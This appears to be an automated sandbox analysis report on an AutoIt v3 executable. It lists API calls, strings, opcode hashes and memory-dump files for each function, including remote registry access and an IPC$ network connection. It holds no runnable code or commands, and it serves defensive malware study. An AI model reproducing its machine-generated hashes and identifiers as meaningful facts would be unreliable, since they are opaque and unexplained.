Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
String ID: (
API String ID: 3300687185-3887548279
Opcode ID: 275eb9fd0559cd48da15d587c6bdf2e54fd03c1304e28978b64d295bf77ed198
Instruction ID: e43936fdae4e8b66c9faf591c772311a2b8a4d6b662605d2cf10703a0bd7ccae
Opcode Fuzzy Hash: 275eb9fd0559cd48da15d587c6bdf2e54fd03c1304e28978b64d295bf77ed198
Instruction Fuzzy Hash: 36515A71A00349AFDB24CF99C985FAFBBB9EF49310F108419F99A97280D775A904CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00FE000A, Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00FE0030
GetFileSize.KERNEL32(00000000,00000000), ref: 00FE004B
GlobalAlloc.KERNEL32(00000002,00000000), ref: 00FE0056
GlobalLock.KERNEL32 ref: 00FE0063
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00FE0072
GlobalUnlock.KERNEL32(00000000), ref: 00FE0079
CloseHandle.KERNEL32(00000000), ref: 00FE0080
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00FE008D
OleLoadPicture.OLEAUT32(?,00000000,00000000,010329F8,?), ref: 00FE00AB
GlobalFree.KERNEL32(00000000), ref: 00FE00BD
GetObjectW.GDI32(?,00000018,?), ref: 00FE00E4
CopyImage.USER32 ref: 00FE0115
DeleteObject.GDI32(?), ref: 00FE013D
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00FE0154

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3969911579-0
Opcode ID: 55b0fbd0458837b1746b270d1c506d3a1190ef32b535f0089718b8126a4e907b
Instruction ID: 1aa89060409209d074ed116b1e4baa16ffa399c93732b5368bab562d4fcda002
Opcode Fuzzy Hash: 55b0fbd0458837b1746b270d1c506d3a1190ef32b535f0089718b8126a4e907b
Instruction Fuzzy Hash: E5414C75600208BFD720DF65DC84FAA77BCEF49711F108154FA459B284DBB9AD41DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0100516A, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32 ref: 010051A3
DeleteMenu.USER32 ref: 0100520F
DeleteMenu.USER32 ref: 01005225
GetMenuItemCount.USER32(?), ref: 01005236
SetMenu.USER32 ref: 01005244
DestroyMenu.USER32 ref: 01005251
DrawMenuBar.USER32 ref: 01005264
DeleteObject.GDI32(?), ref: 010056AB
DeleteObject.GDI32(?), ref: 010056B9
DestroyIcon.USER32(?), ref: 010056C7
DestroyWindow.USER32 ref: 010056D5

Strings

0, xrefs: 0100517C

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
String ID: 0
API String ID: 956284711-4108050209
Opcode ID: 02fc7876cec3ec884b3b6a36f41e519f5b63285f807d823fdc153055259a1406
Instruction ID: 2635269f570d929914f74b06607625430b63574463521df2648900ae37ca93ce
Opcode Fuzzy Hash: 02fc7876cec3ec884b3b6a36f41e519f5b63285f807d823fdc153055259a1406
Instruction Fuzzy Hash: 65411970204202AFE766DF68DC98B6A77E8BF49300F008558FA95CB2C5D775E941CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00FE3478, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00FE3495
gethostname.WSOCK32(?,00000100), ref: 00FE34AF
gethostbyname.WSOCK32(?), ref: 00FE34BC
_wcscpy.LIBCMT ref: 00FE34EB
WSACleanup.WSOCK32 ref: 00FE34F3
_memmove.LIBCMT ref: 00FE350A
inet_ntoa.WSOCK32(?), ref: 00FE3516
_strcat.LIBCMT ref: 00FE3524
_wcscpy.LIBCMT ref: 00FE353B
WSACleanup.WSOCK32 ref: 00FE3549
_wcscpy.LIBCMT ref: 00FE355B

Strings

0.0.0.0, xrefs: 00FE34E5

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 1965227024-3771769585
Opcode ID: 5bc90102937f12bf776e69b8fa9e68dd54d78566f10444d988047a045357e81b
Instruction ID: 56c6a15170b135644d23c313a54d8c8865f818907ee83ee73f5ad7ea482e3db8
Opcode Fuzzy Hash: 5bc90102937f12bf776e69b8fa9e68dd54d78566f10444d988047a045357e81b
Instruction Fuzzy Hash: 0E216D32A00115ABC720EB68DC0AEFE337CFF85321F044199F54997141EF759A4497B0

Uniqueness

Uniqueness Score: -1.00%

Function 0100F55A, Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 00FB2390: _wcslen.LIBCMT ref: 00FB239D
Part of subcall function 00FB2390: _memmove.LIBCMT ref: 00FB23C3

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0100F5C2
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0100F5D9
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0100F5EB
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0100F5FE
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0100F60B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0100F621

Strings

play PlayMe wait, xrefs: 0100F5F9
open , xrefs: 0100F571
close PlayMe, xrefs: 0100F5D4, 0100F606
play PlayMe, xrefs: 0100F61C
status PlayMe mode, xrefs: 0100F5BD
alias PlayMe, xrefs: 0100F59C

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: SendString$_memmove_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 369157077-1007645807
Opcode ID: 02583cf85591bd6dcac25a9fe587843000738d7afada32da715cb664eac03e6a
Instruction ID: e6535298ea2b52aa42b9931afa73207a10666284d17f5f6f0195d1d4997a5622
Opcode Fuzzy Hash: 02583cf85591bd6dcac25a9fe587843000738d7afada32da715cb664eac03e6a
Instruction Fuzzy Hash: 5621A27269021D66E730FBA5DC47FFE73BCFB84B00F100469F644AA0D1DAB469459B94

Uniqueness

Uniqueness Score: -1.00%

Function 00FF9112, Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,000000FF,?), ref: 00FF91FD
SendMessageW.USER32(?,?,00000000,00000000), ref: 00FF9210
CharNextW.USER32(?), ref: 00FF9242
SendMessageW.USER32(?,?,00000000,00000000), ref: 00FF925A
SendMessageW.USER32(?,?,00000000,?), ref: 00FF928B
SendMessageW.USER32(?,?,000000FF,?), ref: 00FF92A2
SendMessageW.USER32(?,?,00000000,00000000), ref: 00FF92B5
SendMessageW.USER32(?,00000402,?), ref: 00FF92F2
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00FF9366
SendMessageW.USER32(?,00001002,00000000,?), ref: 00FF93D0

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: 5f439098e15c8ae2ce5a940ffcb41cdb9af72e432f7af023be0ba871a6d3cc22
Instruction ID: c4635a97cd7ab904eac72829a4077b578e3a9cb6cd914fb6c0668926d69883ef
Opcode Fuzzy Hash: 5f439098e15c8ae2ce5a940ffcb41cdb9af72e432f7af023be0ba871a6d3cc22
Instruction Fuzzy Hash: 5981C432A04208ABDB20DF55DC85FFF7778EF59720F10815AFA149B290D7B99A41DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01003126, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 0100315E
__i64tow.LIBCMT ref: 0100317B
__swprintf.LIBCMT ref: 0100319C
__swprintf.LIBCMT ref: 010031B8
_wcscpy.LIBCMT ref: 010031D6
_wcscpy.LIBCMT ref: 01003212

Strings

%.15g, xrefs: 01003196
True, xrefs: 010031D0
0x%p, xrefs: 010031B2
False, xrefs: 010031E9

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: __swprintf_wcscpy$__i64tow__itow
String ID: %.15g$0x%p$False$True
API String ID: 3038501623-2263619337
Opcode ID: 5461a4acb5a5265b530742a750a40ba14f76805355c73decc84e3ab45072c022
Instruction ID: 0a0f3256aa229d39e7b04475697ac124231a354714eb6a69efddb853d1216f4a
Opcode Fuzzy Hash: 5461a4acb5a5265b530742a750a40ba14f76805355c73decc84e3ab45072c022
Instruction Fuzzy Hash: 9A41D7729002149FE715EB74DD83F6AB368FF46300F0485AAF949CF246E639D918DB92

Uniqueness

Uniqueness Score: -1.00%

Function 0100E525, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON

Download Yara Rule

APIs

LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0100E56D

Part of subcall function 00FB1D10: _wcslen.LIBCMT ref: 00FB1D11
Part of subcall function 00FB1D10: _memmove.LIBCMT ref: 00FB1D57

LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0100E58C
__swprintf.LIBCMT ref: 0100E5E3
_wprintf.LIBCMT ref: 0100E690
_wprintf.LIBCMT ref: 0100E6B4

Strings

%s (%d) : ==> %s:%s%s, xrefs: 0100E68B
%s (%d) : ==> %s:, xrefs: 0100E6AF
Line %d (File "%s"):, xrefs: 0100E5DD
^ ERROR , xrefs: 0100E626
Error: , xrefs: 0100E657

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: LoadString_wprintf$__swprintf_memmove_wcslen
String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2295938435-8599901
Opcode ID: bfcdfb76cec57dc6e09565be6fb1fc40d10aed0680f30b305e2db1e1527b00ee
Instruction ID: 03ccfcb9ce2460297e0c3ade47f76ee74fb3190130c93b3e2e0039b2c168a4b2
Opcode Fuzzy Hash: bfcdfb76cec57dc6e09565be6fb1fc40d10aed0680f30b305e2db1e1527b00ee
Instruction Fuzzy Hash: 0F518172D001099BDB14EBA5DC82DEF7778EF48340F508469E95577242EB78AE05DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FC04E0, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32 ref: 00FC0513
RegisterClassExW.USER32(00000030), ref: 00FC053D
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FC054E
InitCommonControlsEx.COMCTL32(010590E8), ref: 00FC056B
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FC057B
LoadIconW.USER32 ref: 00FC0592
ImageList_ReplaceIcon.COMCTL32(0092CFC0,000000FF,00000000), ref: 00FC05A2

Strings

TaskbarCreated, xrefs: 00FC0543
+, xrefs: 00FC04FC
0, xrefs: 00FC04F5
AutoIt v3 GUI, xrefs: 00FC052F

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 068aeade69bbf233a8bb0d05a29af9989496bc12c81739cd8027aee8974ccf7f
Instruction ID: 77aa965d4ed5be643033f30b6f72a739adee57974852f8db10143d2829277e12
Opcode Fuzzy Hash: 068aeade69bbf233a8bb0d05a29af9989496bc12c81739cd8027aee8974ccf7f
Instruction Fuzzy Hash: 73210EB4901318AFDB20DF95E589B9EBBB9FB0C710F10811AF984A7384D7BA0544DF94

Uniqueness

Uniqueness Score: -1.00%

Function 01021493, Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 01021496
LoadImageW.USER32 ref: 010214B1
SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 010214CA
DeleteObject.GDI32(?), ref: 010214D8
DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 010214E6
LoadImageW.USER32 ref: 01021529
SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 01021542
ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 01021563
DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 01021587
SendMessageW.USER32(?,000000F7,00000001,?), ref: 01021596
DeleteObject.GDI32(?), ref: 010215A4
DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 010215B2

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
String ID:
API String ID: 3218148540-0
Opcode ID: f27af390dc09adc16075708bd7bc330f26b1023f99965594398b85a8f66e9ae7
Instruction ID: 8c576349d02c6bca96773ca804778c66ee2fb85cf39a88306bf7b3926282f09c
Opcode Fuzzy Hash: f27af390dc09adc16075708bd7bc330f26b1023f99965594398b85a8f66e9ae7
Instruction Fuzzy Hash: BD41C131744315ABEB308E69EC49FAA77A8FB44711F104559FA82E72C0CB75E845CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01016555, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 308COMMON

Download Yara Rule

APIs

_wcsncpy.LIBCMT ref: 010165DD
_wcsncpy.LIBCMT ref: 01016609

Part of subcall function 00FBF260: _wcslen.LIBCMT ref: 00FBF262
Part of subcall function 00FBF260: _wcscpy.LIBCMT ref: 00FBF282

_wcstok.LIBCMT ref: 0101664C

Part of subcall function 00FC3DD8: __getptd.LIBCMT ref: 00FC3DDE

_wcstok.LIBCMT ref: 010166FF
GetOpenFileNameW.COMDLG32(00000058), ref: 010168C1
_wcslen.LIBCMT ref: 010168E0
_wcscpy.LIBCMT ref: 0101678E

Part of subcall function 00FB2390: _wcslen.LIBCMT ref: 00FB239D
Part of subcall function 00FB2390: _memmove.LIBCMT ref: 00FB23C3

_wcslen.LIBCMT ref: 0101690A
GetSaveFileNameW.COMDLG32(00000058), ref: 01016954

Part of subcall function 010111B1: _memmove.LIBCMT ref: 01011244

Strings

X, xrefs: 010167E3

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
String ID: X
API String ID: 3104067586-3081909835
Opcode ID: 6deddc765ac2439806403b2922e7593db760344629d5f66e0a427ecf1b67177a
Instruction ID: 8875098bc4cba6624e4df1c5bc5c405b8d5ebbfed05e318bc0ea784a43599a1c
Opcode Fuzzy Hash: 6deddc765ac2439806403b2922e7593db760344629d5f66e0a427ecf1b67177a
Instruction Fuzzy Hash: F9C1B0716043008FD714EB65CC85A9FB7E9BF84350F048A2DF98A87262EB79E945CF52

Uniqueness

Uniqueness Score: -1.00%

Function 010085C8, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00FB2390: _wcslen.LIBCMT ref: 00FB239D
Part of subcall function 00FB2390: _memmove.LIBCMT ref: 00FB23C3

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 01008698
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 010086B5
RegOpenKeyExW.ADVAPI32 ref: 010086D3
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 01008701
CLSIDFromString.OLE32(?,?), ref: 0100872A
RegCloseKey.ADVAPI32(000001FE), ref: 01008736
RegCloseKey.ADVAPI32(?), ref: 0100873C

Strings

SOFTWARE\Classes\, xrefs: 010085F7
\IPC$, xrefs: 0100867B
\CLSID, xrefs: 0100860F

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 600699880-22481851
Opcode ID: de6e1cc06c7e40745250ba27ac517c010dace2307cbea17b16625445d8e2643e
Instruction ID: 27c518befcf1f797a4254b4e5f8068f106b705e0922601a52bdb41ef495bbdc7
Opcode Fuzzy Hash: de6e1cc06c7e40745250ba27ac517c010dace2307cbea17b16625445d8e2643e
Instruction Fuzzy Hash: FF412E76D00209ABDB15EFA8DC45ADEB7B9FF88340F10C019F955A7245EA78E909CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00FC03E0, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32 ref: 00FC03EB
LoadCursorW.USER32 ref: 00FC03FA
LoadIconW.USER32 ref: 00FC0410
LoadIconW.USER32 ref: 00FC0423
LoadIconW.USER32 ref: 00FC0436
LoadImageW.USER32 ref: 00FC045E
RegisterClassExW.USER32(?), ref: 00FC04AD

Part of subcall function 00FC04E0: GetSysColorBrush.USER32 ref: 00FC0513
Part of subcall function 00FC04E0: RegisterClassExW.USER32(00000030), ref: 00FC053D
Part of subcall function 00FC04E0: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FC054E
Part of subcall function 00FC04E0: InitCommonControlsEx.COMCTL32(010590E8), ref: 00FC056B
Part of subcall function 00FC04E0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FC057B
Part of subcall function 00FC04E0: LoadIconW.USER32 ref: 00FC0592
Part of subcall function 00FC04E0: ImageList_ReplaceIcon.COMCTL32(0092CFC0,000000FF,00000000), ref: 00FC05A2

Strings

0, xrefs: 00FC047C
#, xrefs: 00FC0483
AutoIt v3, xrefs: 00FC0499

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: b8f59ff0190f1d79a5f4594dfc3d8ccf3ef2409cfc1a3fb021351a22b0eb5e68
Instruction ID: 578d7ab4a64c11f0bb5d624c1b7ccf17ac966598c8d79df25b80f34db0c0034e
Opcode Fuzzy Hash: b8f59ff0190f1d79a5f4594dfc3d8ccf3ef2409cfc1a3fb021351a22b0eb5e68
Instruction Fuzzy Hash: 372153B5D00314ABDB30DF99E985B9B7BB9BB4C700F00409AE644A7285D7BA5500DFD4

Uniqueness

Uniqueness Score: -1.00%

Function 0101B028, Relevance: 16.9, APIs: 11, Instructions: 400registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FB1D10: _wcslen.LIBCMT ref: 00FB1D11
Part of subcall function 00FB1D10: _memmove.LIBCMT ref: 00FB1D57

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0101B103

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: ConnectRegistry_memmove_wcslen
String ID:
API String ID: 15295421-0
Opcode ID: af5cb6157ac83270e99e81bf24b68b5470d485db957a5a021fe0dd021f82141b
Instruction ID: 0dd8734efcf23b5166716a77d31a7962b8ea2cce2cc29e25b63a4d29e20a866b
Opcode Fuzzy Hash: af5cb6157ac83270e99e81bf24b68b5470d485db957a5a021fe0dd021f82141b
Instruction Fuzzy Hash: F9E13B71604201ABD714EF68CD82F6AB7E9BF88704F148A4CF5858B285DB39E905CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0102931C, Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,010295B7), ref: 0102933A
SafeArrayAllocData.OLEAUT32(010295B7), ref: 01029389
VariantInit.OLEAUT32(?), ref: 0102939B
SafeArrayAccessData.OLEAUT32(010295B7,?), ref: 010293BC
VariantCopy.OLEAUT32(?,?), ref: 0102941B
SafeArrayUnaccessData.OLEAUT32(010295B7), ref: 0102942E
VariantClear.OLEAUT32(?), ref: 01029443
SafeArrayDestroyData.OLEAUT32(010295B7), ref: 01029468
SafeArrayDestroyDescriptor.OLEAUT32(010295B7), ref: 01029472
VariantClear.OLEAUT32(?), ref: 01029484
SafeArrayDestroyDescriptor.OLEAUT32(010295B7), ref: 010294A1

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
